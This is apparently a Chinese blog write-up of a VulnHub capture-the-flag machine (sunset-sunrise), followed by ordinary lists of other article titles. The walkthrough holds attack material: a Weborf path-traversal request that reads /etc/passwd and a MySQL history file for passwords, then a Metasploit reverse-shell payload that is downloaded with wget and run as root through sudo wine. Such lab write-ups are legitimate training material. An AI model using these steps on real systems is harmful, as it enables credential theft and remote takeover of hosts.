靶机链接:

https://www.vulnhub.com/entry/sunset-sunrise,406/

主机扫描:

端口扫描:

HTTP 80 目录枚举未果

HTTP 8080

Google search :Weborf/0.12.2 exploit

https://www.exploit-db.com/exploits/14925

Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

成功读取文件,然后我们尝试读取一些敏感的目录和文件,最后读取MySQL的密码:

http://10.10.203.22:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history

尝试使用账户登录系统

如何获取用户sunsire的权限,最后通过MySQL的用户信息获取到了密码

接下来进行提权操作

这里使用wine命令

控制端生成payload

msfpc windows 10.10.203.14

python -m SimpleHTTPServer 8888

use exploit/multi/handler

set encoder x86/shikata_ga_nai

set lhost 10.10.203.14

set lport 443

exploit -j

靶机上执行:

wget http://10.10.203.14:8888/windows-meterpreter-staged-reverse-tcp-443.exe

sudo wine windows-meterpreter-staged-reverse-tcp-443.exe

然后控制端就shell上线了

OVER!!!

最新文章

  1. 解决Android SDK Manager更新、下载速度慢
  2. json格式的优点
  3. MySql中,复制旧表结构到新表
  4. Window.Event.KeyCode=13
  5. 用PHP实现一个高效安全的ftp服务器(一)
  6. textarea高度自适应,随着内容增加高度增加
  7. 关于FFMPeg-PHP你必须要知道的
  8. Python中print和return的区别
  9. 微服务架构集大成者—Spring Cloud (转载)
  10. Hook lua库函数时遇到的问题
  11. 【4】axios 获取数据
  12. 如何查找CpG Islands, CpG shores等 --转载
  13. 2018.12.17 bzoj4802: 欧拉函数(Pollard-rho)
  14. 【慕课网实战】Spark Streaming实时流处理项目实战笔记四之铭文升级版
  15. Express+Less+Gulp配置高效率开发环境
  16. spring 各个版本的源码、jar包和源码jar包下载地址
  17. jquery如何实现点击LI标签和下面的LI互换顺序? 超简单代码
  18. multiboot 的golden image 和update image的 mcs文件的生成及调试
  19. jQuery事件篇---过滤选择器 & 表单选择器
  20. Scrum立会报告+燃尽图(十一月十八日总第二十六次):功能开发与讨论贡献分配规则

热门文章

  1. Windows和Linux换行的区别
  2. FluentData 学习 第一弹
  3. 链接拼接的方法(用于解决同一个脚本返回两种不同的url链接的问题)
  4. API文档自动生成,Swagger的配置
  5. 科普文,搭建python开发环境
  6. Python报错:PermissionError: [Errno 13] Permission denied
  7. Java学习笔记----打印基本数据类型范围
  8. python随机生成字符
  9. 《Python学习手册 第五版》 -第12章 if测试和语法规则
  10. SpringBoot之ApplicationRunner接口和@Order注解